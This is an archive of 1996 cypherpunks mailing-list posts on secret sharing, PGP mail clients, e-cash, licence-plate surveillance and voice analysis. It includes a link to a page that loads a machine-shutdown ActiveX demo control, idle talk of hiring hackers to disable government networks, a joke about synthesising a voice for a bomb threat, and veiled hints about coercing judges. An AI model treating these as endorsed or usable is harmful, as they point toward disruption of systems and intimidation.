From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Sat, 10 Aug 1996 04:23:16 +0800
To: cypherpunks@toad.com
Subject: secret sharing protocol - new or reinvented ?
Message-ID: <9608091638.AA17409@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




Schneier in That Book 2nd Ed p73
refers to "secret sharing with disenrollment",
but without giving details of such a scheme.

He gives a reference [1004] I think, by K Martin,
which has about 10 pages on the subject.
But I have not got it.

I planned a "secret sharing with disenrollment"
scheme last night.  Here is a brief description
and if somebody with the book tells me it's new
 (unlikely I think)
I'll write it up in more formally.  It has a 
resemblance to S/Key, but in the other direction
and using a keyed hash function.

If you see snags with this, I'd like to know.


Peter Allan  peter.allan@aeat.co.uk






Trent chooses his shareholders, a block cypher (or keyed hash),
a threshold, and a number of steps.  The threshold should be more
than half the number of shareholders.

(Say 15 shareholders for a 10 out of 15 scheme,
using DES, over 20 steps.)

Trent generates 15 64-bit DES keys (not caring about parity),
and gives them securely one to each shareholder.  He introduces all
shareholders to each other so they can recognise each other later.
He also tells them the number of steps (here 20).

Trent (in possession of all shares) calculates the secret, which
is a 64-bit number.  Obviously this could just be a key for a
secret not yet created at share distribution time.

Secret calculation is performed by executing the required number
of steps, and the result of the last step is the secret. 

Disenrollment (conducted by shareholders, presumably under
orders from Trent) is the performance of one step, omitting
those to be disenrolled.  (The number of possible disenrollments
is limited by the threshold.)

One step is this set of actions:

   Using a normal threshold scheme, such as Shamir's Lagrange Polynomials
   a sufficient number of shareholders construct a single secret from their
   shares.  Call this M.  M is then used to update all their shares using a
   keyed hash function.

   Table 18.1 suggests      H_i = E H_i-1 (M)  XOR M

   M and every H_i-1 is destroyed.

   Now those absent from the meeting have no M value to advance
   their share, and nobody (even the other shareholders following
   a change of heart) can reproduce it for them.

   Shareholders deduct 1 from the number of steps still to be performed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sat, 10 Aug 1996 08:02:09 +0800
To: provos@wserver.physnet.uni-hamburg.de
Subject: Pronto Mailer
Message-ID: <199608092145.RAA08391@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: provos@wserver.physnet.uni-hamburg.de, cypherpunks@toad.com
Date: Fri Aug 09 17:42:06 1996
I use Pronto Mail also. I just started using it yesterday. I can honestly 
say that it makes things simpler... no cutting, pasting, decrypting, 
encrypting...and on and on. It is the sweetest mailer since Ishmail ( UNIX 
/ Linux ). Not even Ishmail did key management and fetching, sending, 
etc....

I will be able to use Pronto in my effort to proselytize the cause. The 
only thing I see that will prevent a lot of folks from getting it ( and 
paying for it ) is the price. $300 US seems a bit steep to some. I am going 
to pay for it because of the time it saves me. I would like to see a few 
things added, though. Multiple address books, keyed and non-keyed ( this 
might speed up the address book or add a search ( I have several hundred 
members of my firm listed in my Eudora mailer ). I'd also like to see some 
sort of IMAP address book support ( like Simeon or Z Mail ), These would 
also be accessable seperately in the interest of spped, since the pubring 
would be on each users machine.

With the C2 option in the NT Resource kit, I'd like an explanation on using 
Pronto with NT 4. I tried all sorts of things and had no luck after 
installing.. Pronto kept telling me the pifs were no good, couldn't find 
keys, etc...

None the less, I love it so far.. Just have to get the MC down a bit to pay 
for it (<GRIN> That;s why it's a 60 day demo )
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMguwsOJ+JZd/Y4yVAQGeJgQJAU+SB/cl48Jhmu1khb/7p0xG24ruL4cI
av4myCELKV2GgOFfX+u48BLwCkTwRNaMIMdzBkNrQYQdofeSO0WrKJoDQVzMLeas
IK6OUCI3uELqMjtJs1TK2qrDcSKue9COpbPe4D9MzyieuObZ0CDLXhWgWGmA72Up
zFUPMrvd7swEIQ==
=c/6c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sat, 10 Aug 1996 07:55:52 +0800
To: cypherpunks@toad.com
Subject: Fw: The Ostrich Security Principle
Message-ID: <199608092145.RAA08394@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Aug 09 17:42:15 1996
OK Tim, 
I looked up Ontology.. how did you get your license ?
- -----Begin Included Message ----- 
- ---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
- ---- End of forwarded message ----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMguwuOJ+JZd/Y4yVAQE+/wQMDMNJ7XIrI+VkTaNKQDdLkzUT9v8aEQzG
x9/8aFFbw5/jVJQjd3TwWjuRut3L+mc+/2GOqJwQHf1z9vakVDSdnMzIKKB68FfP
NtzU92MoqHip5D/R37cVACcAnXkoaSKvwy+m+V6Rxk2ffOlLoKLEUd9xK91hNFvs
2WymcjvaLC+MLQ==
=owbR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 10 Aug 1996 11:12:00 +0800
To: cypherpunks@toad.com
Subject: Re: Fun with M$
In-Reply-To: <Pine.BSI.3.93.960809134006.10361A-100000@descartes.forequest.com>
Message-ID: <Pine.GUL.3.95.960809173935.15098B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Aug 1996, Jeremey Barrett wrote:

> Information page with a link to a page which loads the control:
> 
> 	http://www.halcyon.com/mclain/ActiveX/
> 
> Quote from the page:
> 
> Exploder is an Active X control which demonstrates security problems with 
> Microsoft's Internet Explorer. Exploder performs a clean shutdown of 
> Win95 and will turn off the power on machines that have a power
> conservation BIOS (green machines).

I love it!

I'll add it to the win95netbugs FAQ tomorrow.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 10 Aug 1996 11:03:24 +0800
To: cypherpunks@toad.com
Subject: Re: Fw: SafE Mail Corporation
In-Reply-To: <9608092200.AA07686@delfinsd.delfin.com>
Message-ID: <Pine.GUL.3.95.960809175133.15098C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I trust their error was corrected on the relevant list?

I notice they've "sweetened" their "hacker" deal for cracking their
software. Now it's an all-expense-paid trip to North Carolina plus about
$400. Still not worth it, unless you're just pissed off.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 10 Aug 1996 06:08:25 +0800
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <Pine.SUN.3.92.960809000709.28414A-100000@julie.teleport.com>
Message-ID: <Pine.LNX.3.94.960809180731.1185D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 9 Aug 1996, Rich Burroughs wrote:

> Date: Fri, 9 Aug 1996 00:12:30 -0700 (PDT)
> From: Rich Burroughs <richieb@teleport.com>
> To: cypherpunks@toad.com
> Subject: Re: Oregon License Plate Site in the News Tonight!
> 
> I wrote:
> > > I do think that the information should be able to be disseminated on the
> > > Net as long as it's legal.
> > >
> 
> "The Deviant" wrote:
> > Yes, but I can also see why its a bad idea to put somebody's VIN on the
> > Net... A clever terrorist would simply plant peices of metal with some
> > other loser's VIN's in their car before blowing up a building, (i.e. my
> > name's McVeigh (sp?), and this rider truck came from Oregon ;)... see my
> > point?
> 
> A clever terrorist could get the CD and do the same thing :)  They're
> clever, right?
> 

Yes, well, true, but my point was that not _all_ of that information
should be available AT ALL.

> > I do think that some information could be allowed (what your tag says,
> > your name, your mailing address), but what was put on he net was excesive.
> 
> That's a function of what information the State decides to make availble.
> The fact that it's on the Net or not shoudln't be the issue.  If I can buy
> it on a CD or march into a State office and get it, the same potential
> harms exist.
> 
> I persoannly think this info is a privacy threat.  But if it's legal to
> distribute in other forums, the Net should be no different, IMHO.  All Net
> terrorist hype aside.
> 

I agree.  If its available, the net is as good a medium as any.

 --Deviant
You know you've been spending too much time on the computer when your
friend misdates a check, and you suggest adding a "++" to fix it.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgt+1DAJap8fyDMVAQHctQf+Mg3pI74FLc9VzfeZoLDUU0DLzM0UYKg/
7G1HVUXPOS3CRuc40vUTx+1LO/6uGyfDUvZeW/tGEOP0tKAJ9jWZZbrbvs3XBl+G
+HPu7f4rJcsLqRLEVW8wGbJ+Z15RjtrJaB/A/QUxFwmz8y6b8XN1uAAb1Myh2fiT
XMwHW6L+dGsMIKZpAf018kdktlSLsgY4lkgcMb1b6utZkonX5POSw7DCmThOmFNp
gSaL5eKmLRHpYI2SAL48sAXvPD3Yg397/3bApIi7X2EzAlfEttg0lYlt2IMIKNsi
R+Zovv+npr/uqU4mTfwCgshHMQTXfMaXeKz8S55nQt1Tsvc6ZOIPPA==
=Q2OD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 10 Aug 1996 11:15:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
In-Reply-To: <199608092330.QAA26402@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960809180401.26357G-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 9 Aug 1996, jim bell wrote:

> Would it be possible to modify speech to remove the identifiable 
> characteristics which came from the speaker, and replace them
> with those of some other person.  

Equipment exists that can remove the microtremors associated with
stress, thus defeating voice stress analysis technology.  Modeling
someone elses voice print would seem to be of little value, if
possible at all.

However, one could use voice-synthesis software to phone in a
bomb threat.  (The cops would probably arrest Stephen Hawkings 
on the basis of the voice print.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 10 Aug 1996 13:11:18 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Why should we trust the system?
Message-ID: <199608100120.SAA02197@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 AM 8/9/96 +0000, jonathon wrote:
>On Thu, 8 Aug 1996, jim bell wrote:
>
>> Okay, I'll admit that I _never_ believed that judges actually follow the 
>> standards they claim to.  But many other people of those who are more 
>
>	I know of a very good way to ensure that judges do follow
>	the standards that they claim to follow.
>
>	It works even better at making politicians keep all the
>	election promises the make.
>
>	Has one drawback --- it reduces the number of people willing
>	to carry out those two functions to virtually zero.  OTOH, that
>	probably would be a very good thing.  
>

That's odd...I know of one also!    B^)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 10 Aug 1996 08:45:27 +0800
To: cypherpunks@toad.com
Subject: Electronic Cash System Based On The Representation
Message-ID: <199608092225.SAA26589@mccannerick-bh.mccann.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting paper I had not heard of, but was recently referred to...

http://www.cwi.nl/~brands/cash.html

Electronic Cash System Based On The Representation 
Problem Stefan Brands CWI 
P.O. Box 4079, 1009 AB Amsterdam 
The Netherlands e-mail: brands@cwi.nl 

Abstract: We present a new on-line electronic cash system based on a
problem, called the representation problem, of which little use has been
made in literature thus far. Our system is the first to be based entirely on
discrete logarithms. Using the representation problem as a basic concept,
some techniques are introduced that enable us to construct protocols for
withdrawal and payment that do not use the cut and choose methodology of
earlier systems. As a consequence, our cash system is much more efficient in
both computation and communication complexity than previously proposed
systems. Another important aspect of our system concerns its provability .
Contrary to previously proposed systems, its correctness can be
mathematically proven to a very great extent. Specifically , if we make one
plausible assumption concerning a single hash-function, the ability to break
the system seems to imply that one can break the Diffie-Hellman problem. Our
system offers a number of extensions that are hard to achieve in previously
known systems. In our opinion the most interesting of these is that the
entire cash system (including all the extensions) can be incorporated
straight forwardly in a setting based on wallets with observers, which has
the important advantage that double- spending can be prevented in the
\014rst place, rather than detecting the identity of a double-spender after
the fact. In particular, it can be incorporated even under the most
stringent requirements conceivable about the privacy of the user, which
seems to b e impossible to do with previously proposed systems. Another
benefit of our system is that framing attempts by a bank have negligible
probability of success (independent of computing power) by a simple
mechanism from within the system, which is something that p previous
solutions lack entirely . Furthermore, the basic cash system can be extended
to checks, multi-show cash and divisibility , while retaining its
computational efficiency. Although in this paper we only make use of the
representation problem in groups of prime order, similar intractable
problems hold in RSA-groups (with computational equivalence to facto ring
and computing RSA- roots). We discuss how one can use these problems to
construct an efficient cash system with security related to factoring or
computation of RSA-roots, in an analogous way to the discrete log based
system. Finally , we discuss a decision problem (the decision variant of the
Diffie-Hellman problem) that is strongly related to undeniable signatures,
which to our knowledge has never been stated in literature and of which we
do not know whether it is in BPP. A p roof of its status would be of
interest to discrete log based cryptography in general. Using the
representation problem, we show in the appendix how to batch the
confirmation protocol of undeniable signatures such that polynomially many
undeniable signatures can be verified in four moves. 

AMS Subject Classification (1991) : 94A60 
CR Subject Classification (1991) : D.4.6 
Keywords and Phrases : Cryptography , 
Electronic Cash, Representation Problem 
_______________________
Regards,            It is not because things are difficult that we do not dare; 
                    it is because we do not dare that they are difficult.
-Seneca
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank E. Terhaar-Yonkers" <fty@mcnc.org>
Date: Sat, 10 Aug 1996 08:34:34 +0800
To: stewarts@ix.netcom.com
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.
Message-ID: <199608092229.SAA12419@robin.mcnc.org>
MIME-Version: 1.0
Content-Type: text/plain


It's been doable and afforadable for years.  7 years ago when I lived in
Knoxville TN there was(still is?) a firm there called Perceptics.  One of 
their products was an imaging system to OCR license plates.  I understood
the system was/is in use or being tested at US border crossings.

 >Date: Fri, 09 Aug 1996 11:56:34 -0700 Bill Stewart wrote:
 >At 10:45 PM 8/8/96 -0700, Lucky wrote:
 >>At 21:55 8/8/96, i am not a number! wrote:
 >>>CBS radio news this morning: 80,000 commuters traveling the central
 >>>f'way in SF will have information mailed to them regarding the quake retrofit
 >>>How?  Their license plates have been photographed.
 >
 >>You *are* making this up, right? Please say you did.
 >
 >It's possible today, and probably affordable.  If not, it will be in 1-2 years,
 >as Moore's law cranks down processing costs and video technology improves.
 >For this application, they don't have to photograph every car, or read every
 >plate successfully, or do it in real time.  The objective is to get lots of
 >drivers to take other routes or mass transit so they don't have to dump all
 >the traffic onto surface streets right around the construction.
 >
 >Besides, this is nice friendly San Francisco.  Imagine New York City doing it:
 >        Yo!  Mr. E. Koch, 1234 E. 89th St. -
 >        We saw you takin' the West Side Highway last week.
 >        You better stop that as of next Friday. 
 >        We know where you live.  
 >        You got a problem wit' that?
 >                        Rudy.
 >
 >#			Thanks;  Bill
 ># Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
 ># <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!
 >

\\\\////\\\\////\\\\\////\\\\\////\\\\////\\\\////\\\\////\\\\////\\\\////\\\\
Frank Terhaar-Yonkers,  Manager
High Performance Computing and Communications Research
MCNC
PO Box 12889	3021 Cornwallis Road
Research Triangle Park,  North Carolina  27709-2889
fty@mcnc.org   voice (919)248-1417   FAX (919)248-1455

http://www.mcnc.org/hpcc.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 10 Aug 1996 13:32:21 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: John Gilmore on the Radio!
In-Reply-To: <Pine.GUL.3.95.960809165855.15077A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960809184024.26357I-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 9 Aug 1996, Rich Graves asked:

> (Hey, shouldn't there be a SF Bay Area cpunks meeting tomorrow?

Cypherpunks operate on Parisian time.  Every August many of us 
flee the Bay Area or are too sluggish to go to meetings.  (Now
parties are usually a different matter.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 10 Aug 1996 11:51:27 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
Message-ID: <199608100145.SAA03557@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:09 PM 8/9/96 -0700, Sandy Sandfort wrote:
>On Fri, 9 Aug 1996, jim bell wrote:
>
>> Would it be possible to modify speech to remove the identifiable 
>> characteristics which came from the speaker, and replace them
>> with those of some other person.  
>
>Equipment exists that can remove the microtremors associated with
>stress, thus defeating voice stress analysis technology. 


I wonder if such equipment is used on CSPAN and CSPAN-2?

(And that's a serious question!)



There is a relatively famous neurologist named Oliver Sacks who has written 
a series of books concerning odd brain disorders among his and other 
patients.  In one book (maybe it was, "The Man who mistook his wife for a 
hat") he describes a scene where a group of patients with the same ailment 
(maybe it was called "aphasia", but it's been a few years...) were watching 
a speech by Ronald Reagan.    As I recall, people with this ailment can't 
understand what's being said to them, but they CAN tell whether the person 
speaking is telling the truth.  (or, at least, BELIEVES he's telling the 
truth...)  

All the patients laughed at Reagan's speech.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: S Zaid Hassan <ph93szh@brunel.ac.uk>
Date: Sat, 10 Aug 1996 06:24:37 +0800
To: cypherpunks@toad.com
Subject: cybergangs?
Message-ID: <9768.9608091747@molnir.brunel.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain





 Okay, so this is a bit Gibsonish but after reading that piece on cybergangs
 and some of the ecash issues what I wanna know is this:

 There are no laws in cyberspace right? No one to enforce them as such
 shall we say? What happens if a group of hackers/crackers/cypherpunks
 set up shop and started offering their services to the highest bidder?

 Let's say that the US Government bans strong crypto and attempts to
 enforce is using the many, conventional, means at its disposal...
 what happens if the cypherpunks group raises the money to pay a group
 or individual to hack/destroy/grind to a halt milnet? Or some such
 government network? Or all of them? 

 How come this hasn't happened yet? Okay maybe not at such a grand scale,
 but ya know? 

 Hey it's just an idea,

 Zaid


"The wave is already gathering; one day it will wash us away." - Hermann Hesse




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Sat, 10 Aug 1996 11:00:16 +0800
To: cypherpunks@toad.com
Subject: Another thing the Net is being blamed for...
Message-ID: <199608100049.SAA05625@xmission.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


Yet another thing that we're being blamed for.  

FYI, the temple ceremony has been reproduced many times since it was 
first exposed in the 1840s.  The most recent revision (1990) was kept 
secret for only a short time before notorious former members got 
ahold of a tape and transcript of the ceremony.  (I have a good idea 
of how they got it.)  As far as I can tell, it didn't actually make 
it on to the Net until about 1994.

This particular Mormon churchman (Russell Ballard) gave a speech a 
year or so ago warning Mormons in vague terms about the evils of the 
Internet.  I suppose this is part of it.

=====

>From this morning's Rolley&Wells column in the Salt Lake Tribune (without
permission):

   "During a press tour this week of the LDS [Mormon] Church's new Mount
Timpanogos Temple in American Fork, a member of the news media asked
why a writtem copy of the temple ceremony was not given to members
with temple recommends so they could study it in the privacy of their
homes.
   Elder M. Russell Ballard of the Quorum of the Twelve Apostles
informed the reporter that there was no need. A church member had
'broken the covenant' -- taped the ceremony, transcribed it, and put
it on the Internet for all to read."

<end>

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Wilson <serw30@laf.cioe.com>
Date: Sat, 10 Aug 1996 10:39:05 +0800
To: cypherpunks@toad.com
Subject: Re: cybergangs?
Message-ID: <1.5.4.32.19960809230950.006ae3d0@gibson.cioe.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:47 PM 8/9/96 +0100, you wrote:
>
>
>
> Okay, so this is a bit Gibsonish but after reading that piece on cybergangs
> and some of the ecash issues what I wanna know is this:
>
> There are no laws in cyberspace right? No one to enforce them as such
> shall we say? What happens if a group of hackers/crackers/cypherpunks
> set up shop and started offering their services to the highest bidder?
>
> Let's say that the US Government bans strong crypto and attempts to
> enforce is using the many, conventional, means at its disposal...
> what happens if the cypherpunks group raises the money to pay a group
> or individual to hack/destroy/grind to a halt milnet? Or some such
> government network? Or all of them? 
>
> How come this hasn't happened yet? Okay maybe not at such a grand scale,
> but ya know? 
>
> Hey it's just an idea,
>
> Zaid
>
>
>"The wave is already gathering; one day it will wash us away." - Hermann Hesse
>
A kind of Cybermilitia! Can we still wear green uniforms and camouflage face
paint?

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: platinum <bluemoon@mindvox.com>
Date: Sat, 10 Aug 1996 09:36:30 +0800
Subject: Re: Waiting Game on wiretapping and crypto, from HotWired
In-Reply-To: <v01510101ae2d0b1a7fc7@[204.62.128.229]>
Message-ID: <Pine.SOL.3.91.960809193252.7197D-100000@phantom>
MIME-Version: 1.0
Content-Type: text/plain


can anyone tell me why i got nine copies of this message?
	Rose

           I am Rose my eyes are blue / I am Rose and who are you 
            I am Rose and when I sing / I am Rose like anything
                              --Gertrude Stein

		            bluemoon@MINDVOX.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sat, 10 Aug 1996 11:00:55 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate   photo'ed.
In-Reply-To: <199608091854.LAA25837@toad.com>
Message-ID: <roger7mr8m1mt.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Bill Stewart <stewarts@ix.netcom.com> writes:
  > At 10:45 PM 8/8/96 -0700, Lucky wrote:
  >> You *are* making this up, right? Please say you did.

  > It's possible today, and probably affordable.

It's been reasonably affordable for several years.  

Video number plate reading is routinely used around here for gathering
statistics on the points of origin of commuter traffic, for highway
planning purposes.  (The numbers are looked up in the Registry
database to find where each commuter is likely to have come from.)

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sat, 10 Aug 1996 15:42:42 +0800
To: "cypherpunks" <deviant@pooh-corner.com>
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <199608100456.VAA05213@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 9 Aug 96 01:54:52 -0800, deviant@pooh-corner.com wrote:

>> If you accept that, then doesn't that make writing crypto software for
>> any Unix platform *even more* of a waste of time?  Because last time I
>> checked, there were way more Macs on mom-and-pop's desks than Unix
>> machines, counting *all* vendors.

>Pardon my French, but you mus be fucking stupid or somehing.  How many
>universities use UNIX platforms?  How many companies use UNIX platforms?
>Sun, DEC, and SGI don't stay in buisiness by building cheap Windows boxes
>ya know.  There are 13948 _registered_ LINUX machines, not to mention the
>unregistered ones.  Don't tell me that Cray's were designed to run MacOS
>or Windows 95.  UNIX isn' NEARLY as dead as Apple is.

I think the numbers have escaped you:  there are far more Macs than Unix
machines.  It doesn't matter that Unix has a larger market with
universities or Internet weenies, merely that overall more people use
Macs than Unix. Also, FWIW some of those Unix machines are Macs running
A/UX (Apple's Unix).

One last thought: Sun, Dec, SGI, etc all make RISC Unix machines.  Apple
is the largest RISC vendor on the planet...

Given that the Amiga is still around (and may be revived) despite the
fact that the Mac:Amiga ratio is probably the same as the PC:Mac ratio,
I'd say that it's quite likely Apple will stay around.  Inspite of the
hype about loses, Apple posted tens-of-millions-of-dollars profits last
quarter - rare for a dead company... <g>  They still cannot meet the
demand for the PowerBooks - probably the best notebook available at any
cost.

# Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
# Automatically receive my resume or PGPKEY by sending email with a subject
# of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
# Web site: http://www.io-online.com/adamsc/adamsc.htp
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Sat, 10 Aug 1996 14:44:24 +0800
To: cypherpunks@toad.com
Subject: Re: Massively parallel ca
Message-ID: <TCPSMTP.16.8.9.-10.26.28.2780269260.1225298@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 * Carbons sent to: In: tcmay@got.net

 -=> Quoting In:tcmay@got.net to Harka <=-


 In> But the FBI presumably has no data base of voices to compare the voice
 In> on the 911 tape to! They can have the most sophisticated voice analysis
 In> system in the world and it useless, except in comparing the voice to
 In> previously-recorded samples.

 In> (This is presumably how the NSA's capabilities are used, as they have
 In> the voice patterns of Boris Yeltsin, Yassir Arafat, Saddam Hussein, Bob
 In> Dole and other previously-recorded voices. Plus, they can use COMINT at
 In> will outside the U.S. (and maybe in the U.S....) and can acquire new
 In> voice patterns for their libraries.)


Here the technical progresses made in eaves-dropping technology come in really handy. Eaves-dropping on, let's say, apartments is these days rather trivial and a great way of collecting voice samples of 'suspects'.
That the FBI doesn't have a voice database or at least access to one, I seriously doubt. Most of the technologically advanced countries use voice-recognition already to monitor phone traffic. The US does, Germany does, the UK....
The system functions 'vacuum-cleaner-like' and reacts to voice patterns (individual voices) and trigger words. If a trigger word is said, the entire conversation will be recorded and the telephone number on either end determined for later review.
There are a few books out there, that deal with that kind of thing. Unfortunately, I only remember a german one: "The RAF Phantom", written by three journalists. But an Altavista might bring something up too...


Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sat, 10 Aug 1996 15:11:52 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608100428.XAA18766@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Aug 09 23:30:57 1996
> I believe that in California, you may have a PO Box on your 
> driver's license, but the state has to have your "real" address
> in its records.  As noted, some people forget to update this 
> information when they move, and others list their lawyer's 
> address with the state.  Presumably, that should satisfy the 
> legal justifications for requiring an address.

In Missouri, that's all they wanted (a PO Box).  That's
perfectly copacetic by them.  If you want to register for
voting - since we have Motor Voter - they of course need
a real address.  And the post office's requirements for
getting a PO Box are nearly nonexistent.

> >     More important is ensuring that all the addresses that the 
> >     state has on you are the same.  The preference seems to be 
> >     to have the same address as is on one's checks.  
> 
> That may be the preference, but I just use my e-mail address on
> my checks.  If more is required to cut a deal, I can choose to
> add more information by hand if I am willing to do so to do the
> transaction.

I like that - email on cheques.  Wish I'd thought of that before
I ordered my last batch.

>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dave


- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
  "Heard a lot of talk about this Jesus, a man of love,
   a man of strength; but what a man was two thousand
    years ago means nothing at all to me today ... "
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMgwQmDVTwUKWHSsJAQGN1Af+LqxaOOIo/ZfMOLbUxRa09PLO5vArlZyW
sKbngGrr3ZPVVxIkrrhaBTPPQ2VFkzcrx+ixUZa36+tdf0F+Q8oZBbrRy+NBFqMr
D8x/5cHbXQ/1u7dZuHfDx9s0AFeijb2oNZ7XdmuoSb6evS2xuwknx15zLdHqt1LO
AiJgw86Bdwa1eYBYrCLt0JtvVXA8zB5CTZs/ZawpOszlcUwbPptOFH0S6fhGwolC
4zA2qE6nyOiD3efl6Q3TPnlUcusFj3ICa8bvzz3DgRIGJMN/pWHU+A4NmtL/NOoj
MGZfHGDiI27YOF6p+9p+pZ93HJuVJQOd+1US3hXBriM1lrVfNqMUlw==
=oBZP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
